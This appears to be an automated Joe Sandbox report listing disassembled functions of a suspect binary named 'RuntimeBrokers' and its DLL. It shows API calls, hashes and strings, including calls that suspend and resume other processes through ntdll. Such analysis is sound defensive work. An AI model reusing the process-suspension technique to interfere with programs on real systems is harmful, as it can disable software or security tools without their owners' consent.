                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                        • String ID: (oX
                                        • API String ID: 651022567-1321885924
                                        • Opcode ID: 40367f99d1d8dc744f1c72321e7b3499bfc9284936b03d07f90ced811d93fa1d
                                        • Instruction ID: 25a5f9b1be4fb7a3f645b6ea67de45bcffceabfa12e2a1421348382d13fbde0c
                                        • Opcode Fuzzy Hash: 40367f99d1d8dc744f1c72321e7b3499bfc9284936b03d07f90ced811d93fa1d
                                        • Instruction Fuzzy Hash: AD11C671900124EBCF01EBA5E856AEE7F74BF94328F24051EF41177292DB38AE05D799
                                        Function 0049C63F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 0049C646
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0049C650
                                          • Part of subcall function 00433E9D: std::_Lockit::_Lockit.LIBCPMT ref: 00433ED1
                                          • Part of subcall function 00433E9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00433EFF
                                        • std::_Facet_Register.LIBCPMT ref: 0049C6A1
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0049C6C1
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0049C6DF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                                        • String ID: ,oX
                                        • API String ID: 651022567-1237567544
                                        • Opcode ID: cb2880b8a170b302dfa039e30aa7fe3ca80a225f8b5c45196944af02eccc3c62
                                        • Instruction ID: f04567446a72fd8875289fb285c0ef8c7025bfd5ce11c6607e8a1ec8fea137a2
                                        • Opcode Fuzzy Hash: cb2880b8a170b302dfa039e30aa7fe3ca80a225f8b5c45196944af02eccc3c62
                                        • Instruction Fuzzy Hash: D511E0719001189BCF01EBA5D846AAE7BB5BF58314F24042EF810A72A1DF389E059B99
                                        Function 6C0D7FCA Relevance: 10.6, APIs: 7, Instructions: 53timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0D7FD1
                                        • GetLastError.KERNEL32(?,?,?,?,0000003C), ref: 6C0D7FDE
                                          • Part of subcall function 6C0D3569: __EH_prolog3.LIBCMT ref: 6C0D3570
                                        • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,0000003C), ref: 6C0D800D
                                        • FlushFileBuffers.KERNEL32(000000FF,?,?,?,?,0000003C), ref: 6C0D8024
                                        • GetSystemTime.KERNEL32(?,?,?,?,?,0000003C), ref: 6C0D803F
                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,0000003C), ref: 6C0D804D
                                        • SetFileTime.KERNEL32(000000FF,00000000,00000000,?,?,?,?,?,0000003C), ref: 6C0D805E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Time$File$System$BuffersDebugErrorFlushH_prolog3H_prolog3_LastOutputString
                                        • String ID:
                                        • API String ID: 737605373-0
                                        • Opcode ID: 9c56a7c263f85bc3dfc00e8b2b91ca4eb2057895ea639cd27f39263d734764a0
                                        • Instruction ID: 899d847dd07b6ebb295d40f5a9297b91bbb3e24bb48d1c74a7a7d218e0eaadf2
                                        • Opcode Fuzzy Hash: 9c56a7c263f85bc3dfc00e8b2b91ca4eb2057895ea639cd27f39263d734764a0
                                        • Instruction Fuzzy Hash: 9D115872D10708EFDF60DBF4C809BCEB7B8BF09310F400626F251A65A0D774AA498B91
                                        Function 6C15E858 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C15E85F
                                        • ?disk_is_fixed_remote@Sys_wrapper@common@ierd_tgp@@SA_NPB_W@Z.COMMON(?,00000050), ref: 6C15E868
                                          • Part of subcall function 6C15A9D5: __EH_prolog3_GS.LIBCMT ref: 6C15A9DF
                                          • Part of subcall function 6C15A9D5: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000258,6C150748,?,00000050), ref: 6C15A9E8
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000050), ref: 6C15E872
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        • _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?,00000050), ref: 6C15E8CF
                                        Strings
                                        • [Sys_wrapper]path is not valid in waccess_fixed_remote, xrefs: 6C15E8AA
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C15E896
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_$?disk_is_fixed_remote@?get_log_instance@base@@H_prolog3H_prolog3_catch_Logger@1@Sys_wrapper@common@ierd_tgp@@_waccesswcslen
                                        • String ID: [Sys_wrapper]path is not valid in waccess_fixed_remote$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 673643358-2021405213
                                        • Opcode ID: 65d1903708b140f2cf2dce9b27394e2e42a104ac4a3ef7e41313aa3d5a11f065
                                        • Instruction ID: f0c61ae806292b2e4ec974842d364aa337e4fa881c5918ff0feb3582ddc78f8b
                                        • Opcode Fuzzy Hash: 65d1903708b140f2cf2dce9b27394e2e42a104ac4a3ef7e41313aa3d5a11f065
                                        • Instruction Fuzzy Hash: EF01F271A00600ABCB24AA60DC15FCC33609F11728F604454E5253FAC0CB3AAA2E8AD4
                                        Function 0044E428 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30windowregistryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadIconW.USER32(?,0000006B), ref: 0044E456
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0044E466
                                        • LoadIconW.USER32(?,0000006C), ref: 0044E489
                                        • RegisterClassExW.USER32(00000030), ref: 0044E496
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Load$Icon$ClassCursorRegister
                                        • String ID: 0$m
                                        • API String ID: 4202395251-432128193
                                        • Opcode ID: 151a3f011129d98db1e7ba2bfebb6cb62cb236ed82e29d05a44dec338b6d7543
                                        • Instruction ID: 3b281e02e49700e742bc7361f56d08e39c5c5db805139341fea0a0500c4f3d46
                                        • Opcode Fuzzy Hash: 151a3f011129d98db1e7ba2bfebb6cb62cb236ed82e29d05a44dec338b6d7543
                                        • Instruction Fuzzy Hash: 7601F6B0D01309AFEB00DFA0D90ABEEBFB4BF14706F104419E911BA290D3B956098F94
                                        Function 6C156F9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 25libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 6C156FAB
                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess), ref: 6C156FC1
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C156FC8
                                        • CloseHandle.KERNEL32(00000000), ref: 6C156FD2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Handle$AddressCloseModuleOpenProcProcess
                                        • String ID: NtSuspendProcess$ntdll
                                        • API String ID: 4274107956-3692088986
                                        • Opcode ID: 41f9f1b8d997ddcf2b688fa56cafd1c19f0b45c8ff67677726905584c3cac1ef
                                        • Instruction ID: bc6ebf900f97de245465c9bb08bbacfcd44ed545b61f41acb1c998b73a5f589a
                                        • Opcode Fuzzy Hash: 41f9f1b8d997ddcf2b688fa56cafd1c19f0b45c8ff67677726905584c3cac1ef
                                        • Instruction Fuzzy Hash: CFE08636A5576977C9212BE44C08EDA7F7C9F07761F000541F928D5601C66A95118BE5
                                        Function 6C156023 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 25libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 6C156031
                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess), ref: 6C156047
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C15604E
                                        • CloseHandle.KERNEL32(00000000), ref: 6C156058
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Handle$AddressCloseModuleOpenProcProcess
                                        • String ID: NtResumeProcess$ntdll
                                        • API String ID: 4274107956-2815025094
                                        • Opcode ID: f576ee52bc79e2c42842149c43f1b573ecf0770bcdd8e805521121b132100dd0
                                        • Instruction ID: 24d79e7ab602737f002db504f53fc0acddb17a509b69c02fcf558e252777d702
                                        • Opcode Fuzzy Hash: f576ee52bc79e2c42842149c43f1b573ecf0770bcdd8e805521121b132100dd0
                                        • Instruction Fuzzy Hash: FCE08C7265176977CA312BE48C08EDA7F6CAF077A1F004500FA29DA600CA69D8118BE9
                                        Function 004DC0EE Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: __cftoe
                                        • String ID:
                                        • API String ID: 4189289331-0
                                        • Opcode ID: 06ffbd3c2cb2c9550a7a9437ead67c9e371893e16e39d589c5b620489c0dae41
                                        • Instruction ID: 062eeb95b073928eacef449f974677117976ae7dd14a526402411c915ec852df
                                        • Opcode Fuzzy Hash: 06ffbd3c2cb2c9550a7a9437ead67c9e371893e16e39d589c5b620489c0dae41
                                        • Instruction Fuzzy Hash: 7F512E32900106ABDB219BA98CD1EAF77A9EF45325F24421FF414D6382DB3CDD01CA6C
                                        Function 004223A3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 449COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040CE9A: inet_addr.WS2_32(?), ref: 0040D012
                                        • _strlen.LIBCMT ref: 004229BF
                                        Strings
                                        • config, xrefs: 00422421
                                        • ServerDir::PlayerSelectedServer() Succeed! player selected game server,name:%s, url:%s, xrefs: 00422A8D
                                        • ServerDir::PlayerSelectedServer() Succeed! player selected logic game server,name:%s, include %d child serv, xrefs: 00422AAF
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: _strleninet_addr
                                        • String ID: ServerDir::PlayerSelectedServer() Succeed! player selected game server,name:%s, url:%s$ServerDir::PlayerSelectedServer() Succeed! player selected logic game server,name:%s, include %d child serv$config
                                        • API String ID: 3803591343-2444447332
                                        • Opcode ID: 134e1bc9cb5ef3bd11e6c6fb8b1fd5c462130d7bdb3e39528b37b46e00443460
                                        • Instruction ID: 0426edbd6abc9442d16042799d8485bba40052b75e59c8f95ff165ebdf6e0647
                                        • Opcode Fuzzy Hash: 134e1bc9cb5ef3bd11e6c6fb8b1fd5c462130d7bdb3e39528b37b46e00443460
                                        • Instruction Fuzzy Hash: 302216B1901669DFDB60DB58CD85BEEBBB4AF04309F0440EAE509A7281DB749F84CF19
                                        Function 6C146D5E Relevance: 9.2, APIs: 6, Instructions: 154COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.VCRUNTIME140(?), ref: 6C146DB1
                                        • ?eof@ios_base@std@@QBE_NXZ.MSVCP140 ref: 6C146DCE
                                        • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PAD_J@Z.MSVCP140(?,00002000,00000000), ref: 6C146DEC
                                        • ?eof@ios_base@std@@QBE_NXZ.MSVCP140 ref: 6C146E1F
                                        • ?ToHex@common@ierd_tgp@@YAEABE@Z.COMMON(?), ref: 6C146EAE
                                        • ?ToHex@common@ierd_tgp@@YAEABE@Z.COMMON(?,00000001,?), ref: 6C146EE0
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?eof@ios_base@std@@Hex@common@ierd_tgp@@$?read@?$basic_istream@D@std@@@std@@U?$char_traits@V12@memset
                                        • String ID:
                                        • API String ID: 2389642554-0
                                        • Opcode ID: 74b40a7453f41a085916bd9fd96c0ad3d71044ccedf1b290a5b697b60bb70bc0
                                        • Instruction ID: 10b63fe1b9d36c5aa4173889035b26e0e8a24c8eb4fbfe2fc138666a3fc4cb6e
                                        • Opcode Fuzzy Hash: 74b40a7453f41a085916bd9fd96c0ad3d71044ccedf1b290a5b697b60bb70bc0
                                        • Instruction Fuzzy Hash: 0E515E71A00358DEDB25CF94CC9CBDEBBB9AF08748F0045DAD149A7642C7356A99CF60
                                        Function 6C1338E9 Relevance: 9.1, APIs: 6, Instructions: 122threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C1338F0
                                        • GetCurrentThreadId.KERNEL32 ref: 6C133907
                                        • std::_Cnd_initX.LIBCPMT ref: 6C133933
                                          • Part of subcall function 6C0D17D4: _Mtx_lock.MSVCP140(?,?,?,6C0D1B80,?,00000014), ref: 6C0D17DB
                                          • Part of subcall function 6C0D17D4: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6C0D1B80,?,00000014), ref: 6C0D17E8
                                          • Part of subcall function 6C131BF3: __EH_prolog3.LIBCMT ref: 6C131BFA
                                        • std::_Cnd_initX.LIBCPMT ref: 6C1339B4
                                          • Part of subcall function 6C0D17F3: _Mtx_unlock.MSVCP140(?,?,?,6C0D1BC0,?,?,?), ref: 6C0D17FA
                                          • Part of subcall function 6C0D17F3: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6C0D1BC0,?,?,?), ref: 6C0D1807
                                        • ?PushUniqueThreadAsyncTask@common@ierd_tgp@@YAIV?$function@$$A6AXXZ@std@@IK@Z.COMMON(?,?), ref: 6C1339A4
                                          • Part of subcall function 6C0D158B: __EH_prolog3.LIBCMT ref: 6C0D1592
                                        • ?PushUniqueThreadAsyncTask@common@ierd_tgp@@YAIV?$function@$$A6AXXZ@std@@IK@Z.COMMON(?,?), ref: 6C133A26
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3Thread$AsyncC_error@std@@Cnd_initPushTask@common@ierd_tgp@@Throw_UniqueV?$function@$$Z@std@@std::_$CurrentMtx_lockMtx_unlock
                                        • String ID:
                                        • API String ID: 1795170273-0
                                        • Opcode ID: c9acabee4ebcd316bcfaa82175a169de6edb4495ff21977d90cd8b2410b8c9d9
                                        • Instruction ID: e8a2e47839893e9f92ad5330222ca9ec17e8b089aa5a416e1e7725031a157722
                                        • Opcode Fuzzy Hash: c9acabee4ebcd316bcfaa82175a169de6edb4495ff21977d90cd8b2410b8c9d9
                                        • Instruction Fuzzy Hash: 85517B71C06288DFCB01CFE8C5406DDBFF4AF19208F644199E449AB791D735AB0ADB96
                                        Function 0040C188 Relevance: 9.1, APIs: 6, Instructions: 121filesynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,00002710,F107BA66), ref: 0040C1C4
                                          • Part of subcall function 0040C8ED: _strlen.LIBCMT ref: 0040C953
                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,?,?,?,?), ref: 0040C278
                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,0000049B), ref: 0040C298
                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0040C2BA
                                        • CloseHandle.KERNEL32(00000000), ref: 0040C2CB
                                        • ReleaseMutex.KERNEL32(?), ref: 0040C2D7
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: File$View$CloseHandleMappingMutexObjectOpenReleaseSingleUnmapWait_strlen
                                        • String ID:
                                        • API String ID: 3749474431-0
                                        • Opcode ID: 044ecaef5f613f452148c83caa365c0014643a009507a9b4f3984872ab94ce46
                                        • Instruction ID: 39cfb223ac03234366e3f044e69b61823ee3fa1fb325819f0366b90f42752cb1
                                        • Opcode Fuzzy Hash: 044ecaef5f613f452148c83caa365c0014643a009507a9b4f3984872ab94ce46
                                        • Instruction Fuzzy Hash: 72512530D0438CEFDB11DBA4C949BCDBFB4AF19318F20416AE105BB292D7B45A49EB15
                                        Function 6C0DB853 Relevance: 9.1, APIs: 6, Instructions: 114COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C0DB85A
                                        • __alldvrm.LIBCMT ref: 6C0DB8F0
                                        • _Xtime_get_ticks.MSVCP140(00000008,6C0D67E1,?,00000024,6C0D44C8,?,?,?,?), ref: 6C0DB93C
                                        • __Init_thread_footer.LIBCMT ref: 6C0DB95E
                                          • Part of subcall function 6C1C367B: EnterCriticalSection.KERNEL32(6C43AB18,6C438BA0,6C438BB8,?,6C1022F4,6C438BB8,00000000,6C103CE2,6C103744,?,?,?,00000004,6C1015A5), ref: 6C1C3686
                                          • Part of subcall function 6C1C367B: LeaveCriticalSection.KERNEL32(6C43AB18,?,6C1022F4,6C438BB8,00000000,6C103CE2,6C103744,?,?,?,00000004,6C1015A5), ref: 6C1C36C3
                                        • __Init_thread_footer.LIBCMT ref: 6C0DB9AA
                                        • __Init_thread_footer.LIBCMT ref: 6C0DB9FA
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Init_thread_footer$CriticalSection$EnterH_prolog3LeaveXtime_get_ticks__alldvrm
                                        • String ID:
                                        • API String ID: 719337207-0
                                        • Opcode ID: cb5a7403d4b0c5dc2214f7b476a08345d0da546a187731e3566a64b0a98efe76
                                        • Instruction ID: 7ecd8b4a271b1a65914c956cf181e74983430dafa99e21a92d2380d2d10f61b0
                                        • Opcode Fuzzy Hash: cb5a7403d4b0c5dc2214f7b476a08345d0da546a187731e3566a64b0a98efe76
                                        • Instruction Fuzzy Hash: 224127B4E00344DFCB24EF6AC888A99F7F2EBD6724B56445BE108DB710D734A981CB11
                                        Function 6C12EF31 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C12EF38
                                        • ?str_to_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVpath@filesystem@2@@Z.COMMON(?,?,?,?,?,?,?,0000006C), ref: 6C12EF6A
                                          • Part of subcall function 6C1301EA: __EH_prolog3_GS.LIBCMT ref: 6C1301F1
                                          • Part of subcall function 6C1301EA: ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,0000001C,6C12F183,?,?,00000064,6C0C7177,?,?,?,?), ref: 6C13021C
                                        • ?has_parent_path@path@filesystem@ierd_tgp@@QBE_NXZ.COMMON(?,?,?,?,?,0000006C), ref: 6C12EF7C
